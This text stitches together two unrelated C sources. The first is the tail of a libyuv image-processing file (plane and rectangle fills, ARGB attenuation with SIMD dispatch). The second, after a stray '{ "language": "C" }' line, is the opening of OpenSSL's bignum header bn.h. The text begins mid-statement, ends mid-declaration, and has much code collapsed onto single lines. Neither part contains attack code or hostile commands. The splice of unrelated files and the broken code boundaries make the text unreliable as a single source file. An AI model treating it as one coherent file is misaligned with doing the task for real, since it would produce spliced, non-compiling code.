\n" // store "bgt 1b \n" : "+r"(dst), // %0 "+r"(count) // %1 : "r"(v32) // %2 : "q0", "memory", "cc"); } // TODO(fbarchard): Make fully assembler static void SetRows32_NEON(uint8* dst, uint32 v32, int width, int dst_stride, int height) { for (int y = 0; y < height; ++y) { SetRow8_NEON(dst, v32, width << 2); dst += dst_stride; } } #elif !defined(YUV_DISABLE_ASM) && defined(_M_IX86) #define HAS_SETROW_X86 __declspec(naked) __declspec(align(16)) static void SetRow8_X86(uint8* dst, uint32 v32, int count) { __asm { mov edx, edi mov edi, [esp + 4] // dst mov eax, [esp + 8] // v32 mov ecx, [esp + 12] // count shr ecx, 2 rep stosd mov edi, edx ret } } __declspec(naked) __declspec(align(16)) static void SetRows32_X86(uint8* dst, uint32 v32, int width, int dst_stride, int height) { __asm { push edi push ebp mov edi, [esp + 8 + 4] // dst mov eax, [esp + 8 + 8] // v32 mov ebp, [esp + 8 + 12] // width mov edx, [esp + 8 + 16] // dst_stride mov ebx, [esp + 8 + 20] // height lea ecx, [ebp * 4] sub edx, ecx // stride - width * 4 align 16 convertloop: mov ecx, ebp rep stosd add edi, edx sub ebx, 1 jg convertloop pop ebp pop edi ret } } #elif !defined(YUV_DISABLE_ASM) && (defined(__x86_64__) || defined(__i386__)) #define HAS_SETROW_X86 static void SetRow8_X86(uint8* dst, uint32 v32, int width) { size_t width_tmp = static_cast<size_t>(width); asm volatile ( "shr $0x2,%1 \n" "rep stosl \n" : "+D"(dst), // %0 "+c"(width_tmp) // %1 : "a"(v32) // %2 : "memory", "cc"); } static void SetRows32_X86(uint8* dst, uint32 v32, int width, int dst_stride, int height) { for (int y = 0; y < height; ++y) { size_t width_tmp = static_cast<size_t>(width); uint32* d = reinterpret_cast<uint32*>(dst); asm volatile ( "rep stosl \n" : "+D"(d), // %0 "+c"(width_tmp) // %1 : "a"(v32) // %2 : "memory", "cc"); dst += dst_stride; } } #endif static void SetRow8_C(uint8* dst, uint32 v8, int count) { #ifdef _MSC_VER for (int x = 0; x < count; ++x) { dst[x] = v8; } #else memset(dst, v8, count); #endif } static void 
/* Portable fill of 'height' rows of 'width' 32-bit words each with v32. */
SetRows32_C(uint8* dst, uint32 v32, int width, int dst_stride, int height) {
  for (int y = 0; y < height; ++y) {
    uint32* d = reinterpret_cast<uint32*>(dst);
    for (int x = 0; x < width; ++x) {
      d[x] = v32;
    }
    dst += dst_stride;
  }
}

// Fill a plane of 8-bit pixels with 'value'. Later #if blocks override
// earlier picks, so the strongest qualifying row setter wins.
void SetPlane(uint8* dst_y, int dst_stride_y,
              int width, int height,
              uint32 value) {
  void (*SetRow)(uint8* dst, uint32 value, int pix) = SetRow8_C;
#if defined(HAS_SETROW_NEON)
  if (TestCpuFlag(kCpuHasNEON) && IS_ALIGNED(width, 16) &&
      IS_ALIGNED(dst_y, 16) && IS_ALIGNED(dst_stride_y, 16)) {
    SetRow = SetRow8_NEON;
  }
#endif
#if defined(HAS_SETROW_X86)
  if (TestCpuFlag(kCpuHasX86) && IS_ALIGNED(width, 4)) {
    SetRow = SetRow8_X86;
  }
#endif
#if defined(HAS_SETROW_SSE2)
  if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(width, 16) &&
      IS_ALIGNED(dst_y, 16) && IS_ALIGNED(dst_stride_y, 16)) {
    SetRow = SetRow8_SSE2;
  }
#endif

  // Replicate the low byte into all 4 lanes for the word-based setters.
  uint32 v32 = value | (value << 8) | (value << 16) | (value << 24);
  // Set plane
  for (int y = 0; y < height; ++y) {
    SetRow(dst_y, v32, width);
    dst_y += dst_stride_y;
  }
}

// Draw a rectangle into I420 at (x, y) with the given Y/U/V byte values.
// Returns 0 on success, -1 on invalid arguments (values must be 0..255).
int I420Rect(uint8* dst_y, int dst_stride_y,
             uint8* dst_u, int dst_stride_u,
             uint8* dst_v, int dst_stride_v,
             int x, int y,
             int width, int height,
             int value_y, int value_u, int value_v) {
  if (!dst_y || !dst_u || !dst_v ||
      width <= 0 || height <= 0 ||
      x < 0 || y < 0 ||
      value_y < 0 || value_y > 255 ||
      value_u < 0 || value_u > 255 ||
      value_v < 0 || value_v > 255) {
    return -1;
  }
  // Chroma planes are half resolution in both dimensions (rounded up).
  int halfwidth = (width + 1) >> 1;
  int halfheight = (height + 1) >> 1;
  uint8* start_y = dst_y + y * dst_stride_y + x;
  uint8* start_u = dst_u + (y / 2) * dst_stride_u + (x / 2);
  uint8* start_v = dst_v + (y / 2) * dst_stride_v + (x / 2);

  SetPlane(start_y, dst_stride_y, width, height, value_y);
  SetPlane(start_u, dst_stride_u, halfwidth, halfheight, value_u);
  SetPlane(start_v, dst_stride_v, halfwidth, halfheight, value_v);
  return 0;
}

// Draw a rectangle into ARGB; 'value' is the packed 32-bit pixel written to
// every position. Dispatches directly to the fastest rectangle filler.
int ARGBRect(uint8* dst_argb, int dst_stride_argb,
             int dst_x, int dst_y,
             int width, int height,
             uint32 value) {
  if (!dst_argb ||
      width <= 0 || height <= 0 ||
      dst_x < 0 || dst_y < 0) {
    return -1;
  }
  uint8* dst = dst_argb + dst_y * dst_stride_argb + dst_x * 4;
#if defined(HAS_SETROW_NEON)
  if (TestCpuFlag(kCpuHasNEON) && IS_ALIGNED(width, 16) &&
      IS_ALIGNED(dst, 16) && IS_ALIGNED(dst_stride_argb, 16)) {
    SetRows32_NEON(dst, value, width, dst_stride_argb, height);
    return 0;
  }
#endif
#if defined(HAS_SETROW_X86)
  if (TestCpuFlag(kCpuHasX86)) {
    SetRows32_X86(dst, value, width, dst_stride_argb, height);
    return 0;
  }
#endif
  SetRows32_C(dst, value, width, dst_stride_argb, height);
  return 0;
}

// Convert unattenuated ARGB values to preattenuated ARGB.
// An unattenuated ARGB alpha blend uses the formula
// p = a * f + (1 - a) * b
// where
//   p is output pixel
//   f is foreground pixel
//   b is background pixel
//   a is alpha value from foreground pixel
// A preattenuated ARGB alpha blend uses the formula
// p = f + (1 - a) * b
// where
//   f is foreground pixel premultiplied by alpha

int ARGBAttenuate(const uint8* src_argb, int src_stride_argb,
                  uint8* dst_argb, int dst_stride_argb,
                  int width, int height) {
  if (height < 0) {
    height = -height;
    src_argb = src_argb + (height - 1) * src_stride_argb;
    src_stride_argb = -src_stride_argb;
  }
  void (*ARGBAttenuateRow)(const uint8* src_argb, uint8* dst_argb,
                           int width) = ARGBAttenuateRow_C;
#if defined(HAS_ARGBATTENUATE_SSE2)
  if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(width, 4) &&
      IS_ALIGNED(src_argb, 16) && IS_ALIGNED(src_stride_argb, 16) &&
      IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) {
    ARGBAttenuateRow = ARGBAttenuateRow_SSE2;
  }
#endif
#if defined(HAS_ARGBATTENUATE_SSSE3)
  // SSSE3 block runs after SSE2 and overrides it when it qualifies.
  if (TestCpuFlag(kCpuHasSSSE3) && IS_ALIGNED(width, 4) &&
      IS_ALIGNED(src_argb, 16) && IS_ALIGNED(src_stride_argb, 16) &&
      IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) {
    ARGBAttenuateRow = ARGBAttenuateRow_SSSE3;
  }
#endif

  for (int y = 0; y < height; ++y) {
    ARGBAttenuateRow(src_argb, dst_argb, width);
    src_argb += src_stride_argb;
    dst_argb += dst_stride_argb;
  }
  return 0;
}

// Convert preattenuated ARGB values back to unattenuated ARGB.
int ARGBUnattenuate(const uint8* src_argb, int src_stride_argb,
                    uint8* dst_argb, int dst_stride_argb,
                    int width, int height) {
  if (height < 0) {
    height = -height;
    src_argb = src_argb + (height - 1) * src_stride_argb;
    src_stride_argb = -src_stride_argb;
  }
  void (*ARGBUnattenuateRow)(const uint8* src_argb, uint8* dst_argb,
                             int width) = ARGBUnattenuateRow_C;
#if defined(HAS_ARGBUNATTENUATE_SSE2)
  if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(width, 4) &&
      IS_ALIGNED(src_argb, 16) && IS_ALIGNED(src_stride_argb, 16) &&
      IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) {
    ARGBUnattenuateRow = ARGBUnattenuateRow_SSE2;
  }
#endif

  for (int y = 0; y < height; ++y) {
    ARGBUnattenuateRow(src_argb, dst_argb, width);
    src_argb += src_stride_argb;
    dst_argb += dst_stride_argb;
  }
  return 0;
}

#ifdef __cplusplus
}  // extern "C"
}  // namespace libyuv
#endif
{ "language": "C" }
/* crypto/bn/bn.h */ /* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com) * All rights reserved. * * This package is an SSL implementation written * by Eric Young (eay@cryptsoft.com). * The implementation was written so as to conform with Netscapes SSL. * * This library is free for commercial and non-commercial use as long as * the following conditions are aheared to. The following conditions * apply to all code found in this distribution, be it the RC4, RSA, * lhash, DES, etc., code; not just the SSL code. The SSL documentation * included with this distribution is covered by the same copyright terms * except that the holder is Tim Hudson (tjh@cryptsoft.com). * * Copyright remains Eric Young's, and as such any Copyright notices in * the code are not to be removed. * If this package is used in a product, Eric Young should be given attribution * as the author of the parts of the library used. * This can be in the form of a textual message at program startup or * in documentation (online or textual) provided with the package. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * "This product includes cryptographic software written by * Eric Young (eay@cryptsoft.com)" * The word 'cryptographic' can be left out if the rouines from the library * being used are not cryptographic related :-). * 4. 
If you include any Windows specific code (or a derivative thereof) from * the apps directory (application code) you must include an acknowledgement: * "This product includes software written by Tim Hudson (tjh@cryptsoft.com)" * * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * The licence and distribution terms for any publically available version or * derivative of this code cannot be changed. i.e. this code cannot simply be * copied and put under another distribution licence * [including the GNU Public Licence.] */ /* ==================================================================== * Copyright (c) 1998-2006 The OpenSSL Project. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. 
All advertising materials mentioning features or use of this * software must display the following acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit. (http://www.openssl.org/)" * * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to * endorse or promote products derived from this software without * prior written permission. For written permission, please contact * openssl-core@openssl.org. * * 5. Products derived from this software may not be called "OpenSSL" * nor may "OpenSSL" appear in their names without prior written * permission of the OpenSSL Project. * * 6. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit (http://www.openssl.org/)" * * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * ==================================================================== * * This product includes cryptographic software written by Eric Young * (eay@cryptsoft.com). This product includes software written by Tim * Hudson (tjh@cryptsoft.com). * */ /* ==================================================================== * Copyright 2002 Sun Microsystems, Inc. 
ALL RIGHTS RESERVED. * * Portions of the attached software ("Contribution") are developed by * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project. * * The Contribution is licensed pursuant to the Eric Young open source * license provided above. * * The binary polynomial arithmetic software is originally written by * Sheueling Chang Shantz and Douglas Stebila of Sun Microsystems Laboratories. * */ #ifndef HEADER_BN_H #define HEADER_BN_H #include <openssl/e_os2.h> #ifndef OPENSSL_NO_FP_API #include <stdio.h> /* FILE */ #endif #include <openssl/ossl_typ.h> #include <openssl/crypto.h> #ifdef __cplusplus extern "C" { #endif /* These preprocessor symbols control various aspects of the bignum headers and * library code. They're not defined by any "normal" configuration, as they are * intended for development and testing purposes. NB: defining all three can be * useful for debugging application code as well as openssl itself. * * BN_DEBUG - turn on various debugging alterations to the bignum code * BN_DEBUG_RAND - uses random poisoning of unused words to trip up * mismanagement of bignum internals. You must also define BN_DEBUG. */ /* #define BN_DEBUG */ /* #define BN_DEBUG_RAND */ #ifndef OPENSSL_SMALL_FOOTPRINT #define BN_MUL_COMBA #define BN_SQR_COMBA #define BN_RECURSION #endif /* This next option uses the C libraries (2 word)/(1 word) function. * If it is not defined, I use my C version (which is slower). * The reason for this flag is that when the particular C compiler * library routine is used, and the library is linked with a different * compiler, the library is missing. This mostly happens when the * library is built with gcc and then linked using normal cc. This would * be a common occurrence because gcc normally produces code that is * 2 times faster than system compilers for the big number stuff. * For machines with only one compiler (or shared libraries), this should * be on. 
Again this in only really a problem on machines
 * using "long long's", are 32bit, and are not using my assembler code. */
#if defined(OPENSSL_SYS_MSDOS) || defined(OPENSSL_SYS_WINDOWS) || \
    defined(OPENSSL_SYS_WIN32) || defined(linux)
# ifndef BN_DIV2W
#  define BN_DIV2W
# endif
#endif

/* assuming long is 64bit - this is the DEC Alpha
 * unsigned long long is only 64 bits :-(, don't define
 * BN_LLONG for the DEC Alpha */
/* Word-size configuration: the build defines one of SIXTY_FOUR_BIT_LONG,
 * SIXTY_FOUR_BIT or THIRTY_TWO_BIT, selecting one of the three blocks
 * below (BN_ULONG width, masks, and decimal/hex format strings). */
#ifdef SIXTY_FOUR_BIT_LONG
#define BN_ULLONG	unsigned long long
#define BN_ULONG	unsigned long
#define BN_LONG		long
#define BN_BITS		128
#define BN_BYTES	8
#define BN_BITS2	64
#define BN_BITS4	32
#define BN_MASK		(0xffffffffffffffffffffffffffffffffLL)
#define BN_MASK2	(0xffffffffffffffffL)
#define BN_MASK2l	(0xffffffffL)
#define BN_MASK2h	(0xffffffff00000000L)
#define BN_MASK2h1	(0xffffffff80000000L)
#define BN_TBIT		(0x8000000000000000L)
#define BN_DEC_CONV	(10000000000000000000UL)
#define BN_DEC_FMT1	"%lu"
#define BN_DEC_FMT2	"%019lu"
#define BN_DEC_NUM	19
#define BN_HEX_FMT1	"%lX"
#define BN_HEX_FMT2	"%016lX"
#endif

/* This is where the long long data type is 64 bits, but long is 32.
 * For machines where there are 64bit registers, this is the mode to use.
 * IRIX, on R4000 and above should use this mode, along with the relevant
 * assembler code :-).  Do NOT define BN_LLONG.
 */
#ifdef SIXTY_FOUR_BIT
#undef BN_LLONG
#undef BN_ULLONG
#define BN_ULONG	unsigned long long
#define BN_LONG		long long
#define BN_BITS		128
#define BN_BYTES	8
#define BN_BITS2	64
#define BN_BITS4	32
#define BN_MASK2	(0xffffffffffffffffLL)
#define BN_MASK2l	(0xffffffffL)
#define BN_MASK2h	(0xffffffff00000000LL)
#define BN_MASK2h1	(0xffffffff80000000LL)
#define BN_TBIT		(0x8000000000000000LL)
#define BN_DEC_CONV	(10000000000000000000ULL)
#define BN_DEC_FMT1	"%llu"
#define BN_DEC_FMT2	"%019llu"
#define BN_DEC_NUM	19
#define BN_HEX_FMT1	"%llX"
#define BN_HEX_FMT2	"%016llX"
#endif

/* 32-bit words; BN_ULLONG (double-word type) is only available when the
 * build defines BN_LLONG. */
#ifdef THIRTY_TWO_BIT
#ifdef BN_LLONG
# if defined(_WIN32) && !defined(__GNUC__)
#  define BN_ULLONG	unsigned __int64
#  define BN_MASK	(0xffffffffffffffffI64)
# else
#  define BN_ULLONG	unsigned long long
#  define BN_MASK	(0xffffffffffffffffLL)
# endif
#endif
#define BN_ULONG	unsigned int
#define BN_LONG		int
#define BN_BITS		64
#define BN_BYTES	4
#define BN_BITS2	32
#define BN_BITS4	16
#define BN_MASK2	(0xffffffffL)
#define BN_MASK2l	(0xffff)
#define BN_MASK2h1	(0xffff8000L)
#define BN_MASK2h	(0xffff0000L)
#define BN_TBIT		(0x80000000L)
#define BN_DEC_CONV	(1000000000L)
#define BN_DEC_FMT1	"%u"
#define BN_DEC_FMT2	"%09u"
#define BN_DEC_NUM	9
#define BN_HEX_FMT1	"%X"
#define BN_HEX_FMT2	"%08X"
#endif

/* 2011-02-22 SMS.
 * In various places, a size_t variable or a type cast to size_t was
 * used to perform integer-only operations on pointers.  This failed on
 * VMS with 64-bit pointers (CC /POINTER_SIZE = 64) because size_t is
 * still only 32 bits.  What's needed in these cases is an integer type
 * with the same size as a pointer, which size_t is not certain to be.
 * The only fix here is VMS-specific.
 */
#if defined(OPENSSL_SYS_VMS)
# if __INITIAL_POINTER_SIZE == 64
#  define PTR_SIZE_INT long long
# else /* __INITIAL_POINTER_SIZE == 64 */
#  define PTR_SIZE_INT int
# endif /* __INITIAL_POINTER_SIZE == 64 [else] */
#else /* defined(OPENSSL_SYS_VMS) */
# define PTR_SIZE_INT size_t
#endif /* defined(OPENSSL_SYS_VMS) [else] */

#define BN_DEFAULT_BITS	1280

#define BN_FLG_MALLOCED		0x01
#define BN_FLG_STATIC_DATA	0x02
#define BN_FLG_CONSTTIME	0x04 /* avoid leaking exponent information through timing,
                                      * BN_mod_exp_mont() will call BN_mod_exp_mont_consttime,
                                      * BN_div() will call BN_div_no_branch,
                                      * BN_mod_inverse() will call BN_mod_inverse_no_branch.
                                      */

#ifndef OPENSSL_NO_DEPRECATED
#define BN_FLG_EXP_CONSTTIME BN_FLG_CONSTTIME /* deprecated name for the flag */
                                      /* avoid leaking exponent information through timings
                                      * (BN_mod_exp_mont() will call BN_mod_exp_mont_consttime) */
#endif

#ifndef OPENSSL_NO_DEPRECATED
#define BN_FLG_FREE		0x8000	/* used for debuging */
#endif
#define BN_set_flags(b,n)	((b)->flags|=(n))
#define BN_get_flags(b,n)	((b)->flags&(n))

/* get a clone of a BIGNUM with changed flags, for *temporary* use only
 * (the two BIGNUMs cannot not be used in parallel!) */
#define BN_with_flags(dest,b,n)  ((dest)->d=(b)->d, \
                                  (dest)->top=(b)->top, \
                                  (dest)->dmax=(b)->dmax, \
                                  (dest)->neg=(b)->neg, \
                                  (dest)->flags=(((dest)->flags & BN_FLG_MALLOCED) \
                                                 |  ((b)->flags & ~BN_FLG_MALLOCED) \
                                                 |  BN_FLG_STATIC_DATA \
                                                 |  (n)))

/* Already declared in ossl_typ.h */
#if 0
typedef struct bignum_st BIGNUM;
/* Used for temp variables (declaration hidden in bn_lcl.h) */
typedef struct bignum_ctx BN_CTX;
typedef struct bn_blinding_st BN_BLINDING;
typedef struct bn_mont_ctx_st BN_MONT_CTX;
typedef struct bn_recp_ctx_st BN_RECP_CTX;
typedef struct bn_gencb_st BN_GENCB;
#endif

struct bignum_st
	{
	BN_ULONG *d;	/* Pointer to an array of 'BN_BITS2' bit chunks. */
	int top;	/* Index of last used d +1. */
	/* The next are internal book keeping for bn_expand. */
	int dmax;	/* Size of the d array.
*/ int neg; /* one if the number is negative */ int flags; }; /* Used for montgomery multiplication */ struct bn_mont_ctx_st { int ri; /* number of bits in R */ BIGNUM RR; /* used to convert to montgomery form */ BIGNUM N; /* The modulus */ BIGNUM Ni; /* R*(1/R mod N) - N*Ni = 1 * (Ni is only stored for bignum algorithm) */ BN_ULONG n0[2];/* least significant word(s) of Ni; (type changed with 0.9.9, was "BN_ULONG n0;" before) */ int flags; }; /* Used for reciprocal division/mod functions * It cannot be shared between threads */ struct bn_recp_ctx_st { BIGNUM N; /* the divisor */ BIGNUM Nr; /* the reciprocal */ int num_bits; int shift; int flags; }; /* Used for slow "generation" functions. */ struct bn_gencb_st { unsigned int ver; /* To handle binary (in)compatibility */ void *arg; /* callback-specific data */ union { /* if(ver==1) - handles old style callbacks */ void (*cb_1)(int, int, void *); /* if(ver==2) - new callback style */ int (*cb_2)(int, int, BN_GENCB *); } cb; }; /* Wrapper function to make using BN_GENCB easier, */ int BN_GENCB_call(BN_GENCB *cb, int a, int b); /* Macro to populate a BN_GENCB structure with an "old"-style callback */ #define BN_GENCB_set_old(gencb, callback, cb_arg) { \ BN_GENCB *tmp_gencb = (gencb); \ tmp_gencb->ver = 1; \ tmp_gencb->arg = (cb_arg); \ tmp_gencb->cb.cb_1 = (callback); } /* Macro to populate a BN_GENCB structure with a "new"-style callback */ #define BN_GENCB_set(gencb, callback, cb_arg) { \ BN_GENCB *tmp_gencb = (gencb); \ tmp_gencb->ver = 2; \ tmp_gencb->arg = (cb_arg); \ tmp_gencb->cb.cb_2 = (callback); } #define BN_prime_checks 0 /* default: select number of iterations based on the size of the number */ /* number of Miller-Rabin iterations for an error rate of less than 2^-80 * for random 'b'-bit input, b >= 100 (taken from table 4.4 in the Handbook * of Applied Cryptography [Menezes, van Oorschot, Vanstone; CRC Press 1996]; * original paper: Damgaard, Landrock, Pomerance: Average case error estimates * for the 
strong probable prime test. -- Math. Comp. 61 (1993) 177-194) */ #define BN_prime_checks_for_size(b) ((b) >= 1300 ? 2 : \ (b) >= 850 ? 3 : \ (b) >= 650 ? 4 : \ (b) >= 550 ? 5 : \ (b) >= 450 ? 6 : \ (b) >= 400 ? 7 : \ (b) >= 350 ? 8 : \ (b) >= 300 ? 9 : \ (b) >= 250 ? 12 : \ (b) >= 200 ? 15 : \ (b) >= 150 ? 18 : \ /* b >= 100 */ 27) #define BN_num_bytes(a) ((BN_num_bits(a)+7)/8) /* Note that BN_abs_is_word didn't work reliably for w == 0 until 0.9.8 */ #define BN_abs_is_word(a,w) ((((a)->top == 1) && ((a)->d[0] == (BN_ULONG)(w))) || \ (((w) == 0) && ((a)->top == 0))) #define BN_is_zero(a) ((a)->top == 0) #define BN_is_one(a) (BN_abs_is_word((a),1) && !(a)->neg) #define BN_is_word(a,w) (BN_abs_is_word((a),(w)) && (!(w) || !(a)->neg)) #define BN_is_odd(a) (((a)->top > 0) && ((a)->d[0] & 1)) #define BN_one(a) (BN_set_word((a),1)) #define BN_zero_ex(a) \ do { \ BIGNUM *_tmp_bn = (a); \ _tmp_bn->top = 0; \ _tmp_bn->neg = 0; \ } while(0) #ifdef OPENSSL_NO_DEPRECATED #define BN_zero(a) BN_zero_ex(a) #else #define BN_zero(a) (BN_set_word((a),0)) #endif const BIGNUM *BN_value_one(void); char * BN_options(void); BN_CTX *BN_CTX_new(void); #ifndef OPENSSL_NO_DEPRECATED void BN_CTX_init(BN_CTX *c); #endif void BN_CTX_free(BN_CTX *c); void BN_CTX_start(BN_CTX *ctx); BIGNUM *BN_CTX_get(BN_CTX *ctx); void BN_CTX_end(BN_CTX *ctx); int BN_rand(BIGNUM *rnd, int bits, int top,int bottom); int BN_pseudo_rand(BIGNUM *rnd, int bits, int top,int bottom); int BN_rand_range(BIGNUM *rnd, const BIGNUM *range); int BN_pseudo_rand_range(BIGNUM *rnd, const BIGNUM *range); int BN_num_bits(const BIGNUM *a); int BN_num_bits_word(BN_ULONG); BIGNUM *BN_new(void); void BN_init(BIGNUM *); void BN_clear_free(BIGNUM *a); BIGNUM *BN_copy(BIGNUM *a, const BIGNUM *b); void BN_swap(BIGNUM *a, BIGNUM *b); BIGNUM *BN_bin2bn(const unsigned char *s,int len,BIGNUM *ret); int BN_bn2bin(const BIGNUM *a, unsigned char *to); BIGNUM *BN_mpi2bn(const unsigned char *s,int len,BIGNUM *ret); int BN_bn2mpi(const BIGNUM *a, 
unsigned char *to); int BN_sub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b); int BN_usub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b); int BN_uadd(BIGNUM *r, const BIGNUM *a, const BIGNUM *b); int BN_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b); int BN_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx); int BN_sqr(BIGNUM *r, const BIGNUM *a,BN_CTX *ctx); /** BN_set_negative sets sign of a BIGNUM * \param b pointer to the BIGNUM object * \param n 0 if the BIGNUM b should be positive and a value != 0 otherwise */ void BN_set_negative(BIGNUM *b, int n); /** BN_is_negative returns 1 if the BIGNUM is negative * \param a pointer to the BIGNUM object * \return 1 if a < 0 and 0 otherwise */ #define BN_is_negative(a) ((a)->neg != 0) int BN_div(BIGNUM *dv, BIGNUM *rem, const BIGNUM *m, const BIGNUM *d, BN_CTX *ctx); #define BN_mod(rem,m,d,ctx) BN_div(NULL,(rem),(m),(d),(ctx)) int BN_nnmod(BIGNUM *r, const BIGNUM *m, const BIGNUM *d, BN_CTX *ctx); int BN_mod_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m, BN_CTX *ctx); int BN_mod_add_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m); int BN_mod_sub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m, BN_CTX *ctx); int BN_mod_sub_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m); int BN_mod_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m, BN_CTX *ctx); int BN_mod_sqr(BIGNUM *r, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx); int BN_mod_lshift1(BIGNUM *r, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx); int BN_mod_lshift1_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *m); int BN_mod_lshift(BIGNUM *r, const BIGNUM *a, int n, const BIGNUM *m, BN_CTX *ctx); int BN_mod_lshift_quick(BIGNUM *r, const BIGNUM *a, int n, const BIGNUM *m); BN_ULONG BN_mod_word(const BIGNUM *a, BN_ULONG w); BN_ULONG BN_div_word(BIGNUM *a, BN_ULONG w); int BN_mul_word(BIGNUM *a, BN_ULONG w); int BN_add_word(BIGNUM *a, BN_ULONG w); int BN_sub_word(BIGNUM *a, 
BN_ULONG w); int BN_set_word(BIGNUM *a, BN_ULONG w); BN_ULONG BN_get_word(const BIGNUM *a); int BN_cmp(const BIGNUM *a, const BIGNUM *b); void BN_free(BIGNUM *a); int BN_is_bit_set(const BIGNUM *a, int n); int BN_lshift(BIGNUM *r, const BIGNUM *a, int n); int BN_lshift1(BIGNUM *r, const BIGNUM *a); int BN_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,BN_CTX *ctx); int BN_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, const BIGNUM *m,BN_CTX *ctx); int BN_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx); int BN_mod_exp_mont_consttime(BIGNUM *rr, const BIGNUM *a, const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *in_mont); int BN_mod_exp_mont_word(BIGNUM *r, BN_ULONG a, const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx); int BN_mod_exp2_mont(BIGNUM *r, const BIGNUM *a1, const BIGNUM *p1, const BIGNUM *a2, const BIGNUM *p2,const BIGNUM *m, BN_CTX *ctx,BN_MONT_CTX *m_ctx); int BN_mod_exp_simple(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, const BIGNUM *m,BN_CTX *ctx); int BN_mask_bits(BIGNUM *a,int n); #ifndef OPENSSL_NO_FP_API int BN_print_fp(FILE *fp, const BIGNUM *a); #endif #ifdef HEADER_BIO_H int BN_print(BIO *fp, const BIGNUM *a); #else int BN_print(void *fp, const BIGNUM *a); #endif int BN_reciprocal(BIGNUM *r, const BIGNUM *m, int len, BN_CTX *ctx); int BN_rshift(BIGNUM *r, const BIGNUM *a, int n); int BN_rshift1(BIGNUM *r, const BIGNUM *a); void BN_clear(BIGNUM *a); BIGNUM *BN_dup(const BIGNUM *a); int BN_ucmp(const BIGNUM *a, const BIGNUM *b); int BN_set_bit(BIGNUM *a, int n); int BN_clear_bit(BIGNUM *a, int n); char * BN_bn2hex(const BIGNUM *a); char * BN_bn2dec(const BIGNUM *a); int BN_hex2bn(BIGNUM **a, const char *str); int BN_dec2bn(BIGNUM **a, const char *str); int 